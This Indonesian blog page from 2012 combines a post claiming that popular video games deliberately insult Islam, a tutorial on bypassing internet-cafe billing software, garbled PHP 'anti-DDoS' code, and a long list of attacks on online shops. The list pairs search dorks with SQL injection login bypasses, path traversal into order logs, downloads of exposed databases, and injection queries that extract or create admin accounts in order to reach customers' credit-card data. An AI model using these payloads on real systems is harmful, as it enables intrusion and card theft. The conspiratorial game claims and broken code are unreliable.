Minggu, 23 Desember 2012

Posted by nandoanggaraputra | File under :
Saya sebagai salah satu dari berjuta umat islam di dunia, merasa memiliki kewajiban untuk menyampaikan berita ini . Game adalah salah satu hiburan yang sangat dan sangat digemari orang , apalagi remaja dan anak-anak. tapi tanpa kita sadari … lewat permainan game tersebut kita telah di jajah oleh orang kafir. dijajah dalam hal waktu, yag bisa membuat kita lupa sholat, dijajah dalam hal keimanan.. melalui game,
orang-orang kafir secara tidak langsung menghipnotis kita, agar kita tertarik dengan apa yang kita mainkan, dan lama-kelamaan kita menggilainya, bahkan merasa bahwa apa yang dimainkan tersebut adalah nyata. Ok sob ,, nih ada beberapa game yang mungkin secara sengaja atau tidak telah menghina islam . Saya sangat prihatin sob ,, karen game2 ini ,, justru game yang disukai remaja dan anak-anak islam, bahkan saya mengaku dengan jujur .. pernah memainkan game ini dan sempat mengilainya.. Ya Allah Ampun ya Allah ””. nih sob daftar game-gamenya :::
DEVIL MY CRY 3


secara garis besar game ini menceritakan seseorang yang bertugas untuk menentang syaitan , dan caranya adalah dengan memasuki sarang setan yang terdiri dari 12 pintu. Dan Mari kita lihat unsur penghinaanya.






Sobat bisa melihat pintu tersebut, pintu tersebut adalah jalan menuju alam setan. pertama kali saya lihat pintunya saya merasa biasa saja, tidak ada yang aneh. dan setelah saya bandingkan dengan gambar yang ini nih,,,




Sobat tau ini gambar apa ???? ini adalah Pintu Ka’bah..dengan sengaja pintu dalam game ini dibuat persis menyerupai pintu ka’bah. dengan maksud apa … tidak lain dan tidak bukan adalah dengan maksud menghina kita semua umat islam, karena telah menyembah sarang setan (ka’bah). Mai kita telusuri lagi :::



Sobat bisa lihat dengan JELASS ,, gambar yang dilingkari tersebut adalah lafadz ALLAH.. Akankah sobat semua terima dengan penghinaan ini. kalo saya sangat tidak terima sob …… lanjut ke game berikutnya ::::


CLIVE BARKER UNDYING


saya sering melihat anak-anak kecil memainkan game ini dengan khusu dan serius sob ,, ya saya merasa maklum.. namanya juga anak kecil. tapi ternyata yang membuat mereka betah memainkan game ini adalah karena mereka digoda sama setan sob… secara tidak sadar mereka sambil bermain game juga sambil ditemanin setan. makanya betah sob.. game ini juga mengisahkan perlawanan terhadap setan. dan letak penghinaanya adalah di saat memasuki istana setan. terdapat lafadz Allah di dindingnya :::





Gambar diatas merupakan gambar istana setan. dan sobat bisa lihat sendiri. dengan jelasssss !!! terpampang tulisan arab dan Lafadz Allah. Nauzubillah… ini seolah-olah mengatakan bahwa siapa saja yang menyembah Allah adalah sekutu setan … Atafirullah…semoga yang buat nih game di azab oleh Allah . Aminn !! Lanjut ke game berikutnya..

PRINCE OF PERSIA



Game yang berlatar tempat di Persia atau sekarang adalah Kawasan Iran,Irak,Mesir ini secara keseluruhan memang bertemakan islam, seorang pangeran yang ceritanya membalas dendam ini memang dengan kasat mata tidak ada unsur penghinaanya terhadap islam. tapi setelah di selidiki.. unsur penghinaanya adalah ::




Sobat bisa lihat pedangnya pangeran dastan.. bertuliskan Arab yang Artinya ”“Sebarkanlah ajaranku walau satu ayat pun” (Sabda Rasulullah SAW). lantas dimana unsur penghinaanya ??? didalam Game ini pangeran membunuh siapa saja yang menghalanginya … dan membunuh prajurit-prajurit persia, tahukah sobat bahwa prajurit persia adalah muslim. secara tidak langsung game ini mengatakan bahwa ajaran Rasullulah yang disebarkan adalah ajaran membunuh. dan mengatakan bahwa umat islam adalah kaum barbar. Nauzubillahmindzalik..

GUITAR HERO 3



Orang yang memainkan game ini sob ,, dibuat mabukkk !!! seolah-olah merasakn lantunan lagu dan jingkrak-jingkrak seperti yang di game… tanpa mereka sadari …. Game ini menghina islam dengan Telak dan Jelas .. mari kita lihat ::::




Apakah sobat terima ???? kalo saya Sangat TIDAK terima… Lafdz ALLAH dengan jelas terpampang dilantai panggung dan di injak-injak.. dan coba sobat lihat latar belakang panggung adalah setan-setan semua. Nauzubillah …. semoga Allah yang maha perkasa menghukum dengan hukuman yang pedih ..

RESIDENT EVIL 4



Game yang bisa dibilang seru dan digemai remaja ini merupakan salah satu game yang menhina Islam sob … di dalam Game ini diceritakan seorang yang bertugas mengemban misi menyelamatkan dunia dari ancaman zombie (mayat hidup) dan zombie disini adalah dikategorikan jahat dan wajib di bunuh. Unsur penghinaanya sebenarnya sudah ada sejak pertama kali main, tapi yang sangat Jelas adakah saat Leon memasuki Sarang Zombie . Pintu tersebut terdapat simbol Iluminati dan pintu tersebut dibuat persis dengan pintu Pintu Omar Bin Khattab, Masjid Nabawi. Mari kita lihat :::



Lambang Asli Iluminati pada pintu tersebut



di bawah ini adalah pintu Umar Bin Khattab



Gabungan dan Unsur penghinaannya adalah :





sangat jelas bukan … gambar kaligrafi dari pintu umar bin khattab dibuat sama persis tanpa diubah Tulisan Kaligrafi yang Berlafadz Nabi Muhammad. dan di tindih dengan lambang iluminati .Nauzubillah…kita dapat mengambil kesimpulan bahwa sarang zombi , berpintu dengan lafadz Nabi Muhammad SAW, jadi maksud dari penghinaan ini adalah ,, kita semua umat islam pengikut nabi Muhammad SAW digambarkan zombie yang wajib dimusnahkan dari muka bumi. NAUZUBILLAHMINZALIK …
ok sob ,,, itu tadi penelusuran saya tentang Game yang Menghina Islam. mari kita musnahkan game tersebut dengan cara tidak memainkannya, saya harap setelah sobat membaca artikel ini,, sobat memberitahukan kepada sobat-sobat yang lainnya yang belom tau,,, sebenarnya hampir semua game memiliki unsur yang sedikit menyinggung Islam, tapi saya rasa game yang telah saya bahas ini ,, sangat telak dan wajib dijauhi . wajib loh sob !!!! saran saya .. marilah kita menggunakan waktu dengan hal yang berguna ,,, sebelum saya mengetahui Game-game ini

SUMBER:http://ddeadnote.blogspot.com/2012/0...ina-agama.html

Subhanallah, gimana komentar kalian semuanya?

Sabtu, 22 Desember 2012

Posted by nandoanggaraputra | File under :
Hallo semuanya, bosan dengan teknik-teknik hacking yang itu-itu dan banyak bertebaran di internet? Kali ini saya akan memberikan sedikit tutorial hacking yang ringan dan insyaallah bisa diterapkan semua orang :D . Untuk mempelajarinya tidak sulit kok, tidak memerlukan kemampuan khusus bahkan orang awam yang baru mampir ke warnet pun bisa melakukan hal ini.
Ya, mungkin Anda berfikir cara ini adalah cara bunuh diri untuk saya. Kok mau-maunya ya seorang operator warnet mengajarkan cara untuk mengakali warnetnya sendiri? Bukan tanpa alasan, saya melakukan ini karena saya sadar ilmu adalah pemberian dari Tuhan Yang maha Esa, dan dengan menyembunyikan ilmu itu berarti saya telah mengingkari nikmat dari Tuhan. Jadi semua orang di dunia ini berhak untuk mendapatkan ilmu.
Langsung saja, dalam kegiatan hacking Billing Explorer Client ini saya menggunakan bantuan dari program bernama hackclient.exe yang saya temukan dari forum HNc. Karena tutorial disana kurang lengkap maka sebagai tanda balas jasa atas ilmu yang telah saya peroleh maka saya membuat tutorial sederhana ini.
Billing Explorer Client (Logged)
Billing Explorer Client (Logged)
Di warnet masuk sebagai Personal dan siapkan modal program aplikasi hackclient.exe yang dapat diperoleh darihttp://www.4shared.com/file/Xyw_iMyz/hackclient.html
Program Hack Billing
Program Hack Billing
Jika sudah didapat lalu jalankan aplikasinya. Maka akan muncul tampilan seperti berikut ini :
Tampilan Utama Program Hackbilling
Tampilan Utama Program Hackbilling
Perhatikan disana ada 2 program billing client, gag usah bingung gambar yang tampil di atas adalah billing client yang palsu, sedangkan yang asli ada di bagian paling kiri, yang tampilannya paling sederhana, dan yang pada awal tadi telah Anda lihat.
Ikuti petunjuk berurutan sesuai yang ada pada program billing client palsu. Jika beruntung maka Anda bisa keluar dari program billing client dan menikmati hampir semua fasilitas windows yang dikunci oleh billing client aslinya.
Jendela Disconnect Billing
Jendela Disconnect Billing
Perhatikan bahwa cara ini tidak akan mengurangi nilai nominal yang tertera di billing server (operator) yang harus Anda bayarkan. Ada baiknya tutorial ini digunakan untuk pembelajaran bukan untuk perbuatan jahat. Kasihan operator dan pemilik warnetnya, untuk mendapat 2000 perak pun terhalang dengan ulah pemakai aplikasi ini.
Jadi gunakan dengan bijak ya ;-D
Dan selamat bereksperimen :D
Posted by nandoanggaraputra | File under :

Mungkin anda pernah mengalami, pada waktu menghubungkan flashdisk atau modem ke perpanjangan kabel USB ( USB Extender ) ternyata perangkat tersebut tidak dikenali oleh komputer anda, padahal flashdisk, modem dan port USBnya bekerja dengan baik. Mengapa hal ini bisa terjadi ?

Sabtu, 15 Desember 2012

Posted by nandoanggaraputra | File under :
Assalamualaikum agan agan 
kali ini saya akan bagi bagi PC, Processor, Vga, Motherboard, SSD, dll (kayak kaya aja bagi bagi bagi hadiah  )

Sabtu, 08 Desember 2012

Posted by nandoanggaraputra | File under : , ,
Hallo sobat semua, kali ini saya akan membahas tentang koding koding PHP, ya memang agak ribet sih :p
para sobat kesel kan kalau ada orang yg sengaja menyerang blog/websitenya dengan paket data (red:DDOS) ? kali ini saya akan membahas scriptnya, disimak yaa :)

Script dibawah ini untuk diindex.php :D

$ Ad_ddos_query = 10, / / hitungan detik pendeteksi serangan DDOS gan
$ Ad_check_file = 'check.txt'; / / file untuk ketika kita ingin memeriksa
$ Ad_temp_file = 'all_ip.txt'; / / file sementara
$ Ad_black_file = 'black_ip.txt'; / / daftar yg akan dikirimkan ke zombie machine ip
$ Ad_white_file = 'white_ip.txt'; / / IP Pengunjung Situs
$ Ad_dir = 'anti_ddos'; / / folder ANTI DDOS
$ Ad_num_query = 0, / / hitungan data masuk sebelum file $ check_file
$ Ad_sec_query = 0, / / kedua setelahnya file $ check_file
$ Ad_end_defense = 0, / / matikan ketika sedang melindungi file $ check_file
$ Ad_sec = date ("s"); / / detik yg sedang berlangsung
$ Ad_date = date ("mdHis"); / / waktu saat ini
$ Ad_defense_time = 10000 / / Serangan DDOS yg dideteksi waktu ketika dihentikan pemeriksaan



if (! file_exists ("{$ ad_dir} / {$ ad_check_file}") or! file_exists ("{$ ad_dir} / {$ ad_temp_file}") or! file_exists ("{$ ad_dir} / {$ ad_black_file}") or ! file_exists ("{$ ad_dir} / {$ ad_white_file}") or! file_exists ("{$ ad_dir} / anti_ddos.php")) {
die ("tidak cukup filenya gan.");
}

require ("{$ ad_dir} / {$ ad_check_file}");

if ($ ad_end_defense and $ ad_end_defense> $ ad_date) {
require ("{$ ad_dir} / anti_ddos.php");
} Else {
if ($ ad_sec == $ ad_sec_query) {
$ Ad_num_query + +;
} Else {
$ Ad_num_query = '1 ';
}

if ($ ad_num_query> = $ ad_ddos_query) {
$ Ad_file = fopen ("{$ ad_dir} / {$ ad_check_file}", "w");
$ Ad_end_defense = $ ad_date + $ ad_defense_time;
$ Ad_string = '';
fputs ($ ad_file, $ ad_string);
fclose ($ ad_fp);
} Else {
$ Ad_file = fopen ("{$ ad_dir} / {$ ad_check_file}", "w");
$ Ad_string = '';
fputs ($ ad_file, $ ad_string);
fclose ($ ad_fp);
}
}
?>



AntiDDOS.php dibawah ini:

function getIP () {
if (getenv ("HTTP_CLIENT_IP") and preg_match ("/^[ 0-9 \ .]*?[ 0-9 \ .]+$/ is ", getenv (" HTTP_CLIENT_IP ")) and getenv (" HTTP_CLIENT_IP ") ! = '127 .0.0.1 ') {
$ Ip = getenv ("HTTP_CLIENT_IP");
} Elseif (getenv ("HTTP_X_FORWARDED_FOR") and preg_match ("/^[ 0-9 \ .]*?[ 0-9 \ .]+$/ is ", getenv (" HTTP_X_FORWARDED_FOR ")) and getenv (" HTTP_X_FORWARDED_FOR " !) = '127 .0.0.1 ') {
$ Ip = getenv ("HTTP_X_FORWARDED_FOR");
} Else {
$ Ip = getenv ("REMOTE_ADDR");
}
return $ ip;
}
$ Ad_ip = getIP ();

$ Ad_source = file ("{$ ad_dir} / {$ ad_black_file}");
$ Ad_source = explode ('', $ ad_source [0]);
if (in_array ($ ad_ip, $ ad_source)) {die ();}

$ Ad_source = file ("{$ ad_dir} / {$ ad_white_file}");
$ Ad_source = explode ('', $ ad_source [0]);
if (! in_array ($ ad_ip, $ ad_source)) {

$ Ad_source = file ("{$ ad_dir} / {$ ad_temp_file}");
$ Ad_source = explode ('', $ ad_source [0]);
if (! in_array ($ ad_ip, $ ad_source)) {
$ Ad_file = fopen ("{$ ad_dir} / {$ ad_temp_file}", "a +");
$ Ad_string = $ ad_ip. ' ';
fputs ($ ad_file, "$ ad_string");
fclose ($ ad_fp);
?>


die ();
}
elseif ($ _POST ['ad_white_ip']) {
$ Ad_file = fopen ("{$ ad_dir} / {$ ad_white_file}", "a +");
$ Ad_string = $ ad_ip. ' ';
fputs ($ ad_file, "$ ad_string");
fclose ($ ad_fp);
}
else {
$ Ad_file = fopen ("{$ ad_dir} / {$ ad_black_file}", "a +");
$ Ad_string = $ ad_ip. ' ';
fputs ($ ad_file, "$ ad_string");
fclose ($ ad_fp);
die ();
}
}
?>


buat 4 file txt yaitu check.txt, white_ip.txt, black_ip.txt all_ip.txt
semuanya dibuat di folder/direktori yang sama dan di set PERM 666 (read and write)

lalu buat masukinnya ke file2 yang lain
tinggal input perintah require aja
ni scriptnya : require ("anti_ddos / index.php");
?>

Rabu, 05 Desember 2012

Posted by nandoanggaraputra | File under : , ,
1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik google.com :--> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : 'or'1
pass : 'or'1

2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik --> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan --> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/order.log

3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan --> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb


4. contoh bugs pada bentuk toko sistem :DCShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik --> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan --> /DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt

5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik --> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan --> /admin/dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik --> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan -->
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config -->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager -->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya -->
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

7. contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google: Ketik --> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan --> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/.../cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com: Ketik --> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan --> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.xxxxx.com/cart32/
Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32

9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0 teknik/jalan ke dua
google.com Ketik --> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :
http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,
fldpassword%20from%20tbluser%20where%20fldusername=
'admin'%20and%20fldpassword%20like%20'a%25'--
Gantilah nilai dari string url terakhir dg:
%20'a%25'--
%20'b%25'--
%20'c%25'--
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik --> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp



11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com Ketik --> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan --> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb

12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik --> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan --> ...&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=...&template=order.log

13. contoh bugs pada bentuk toko sistem :Proddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik --> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan --> fpdb/vsproducts.mdb
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb

14. contoh bugs pada bentuk toko sistem :Digishop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google Ketik --> inurl:"/cart.php?m="
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan -->admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection

Usename : 'or"="
Password : 'or"="